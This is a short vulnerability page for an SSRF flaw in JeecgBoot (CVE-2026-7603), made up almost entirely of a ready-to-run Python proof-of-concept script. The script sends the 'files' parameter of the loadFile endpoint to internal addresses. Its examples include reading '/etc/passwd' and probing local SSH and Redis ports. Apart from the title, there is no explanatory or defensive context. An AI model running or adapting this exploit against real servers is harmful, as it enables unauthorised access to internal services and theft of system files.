CVE-2026-7603 JeecgBoot SSRF漏洞

# Proof of Concept for CVE-2026-7603 # This script demonstrates the SSRF vulnerability by sending a malicious request to the LoadFile endpoint. import requests def exploit_ssrf(target_url, internal_url): """ Attempts to trigger the SSRF vulnerability in JeecgBoot. :param target_url: The base URL of the vulnerable JeecgBooot application (e.g., http://localhost:8080) :param internal_url: The URL to attack (e.g., http://127.0.0.1:22 or file:///etc/passwd) """ # The vulnerable endpoint path might vary, typically '/jeecg-boot/sys/common/loadFile' or similar based on version endpoint = "/jeecg-boot/sys/common/loadFile" # Construct the payload by manipulating the 'files' argument payload = { "files": internal_url } try: print(f"[*] Sending request to {target_url}{endpoint} with payload: {payload}") response = requests.get(target_url + endpoint, params=payload, timeout=10) if response.status_code == 200: print(f"[+] Request successful! Server responded. Check response content for signs of SSRF.") print(f"[+] Response Length: {len(response.text)}") # In a real SSRF, the response content might contain data from the internal_url # or the response time might indicate a connection to an internal port. else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] An error occurred: {e}") if __name__ == "__main__": # Replace with the actual target URL target = "http://127.0.0.1:8080" # Example payload to read a local file (if file:// protocol is supported) # or scan an internal port malicious_payload = "http://127.0.0.1:6379" exploit_ssrf(target, malicious_payload)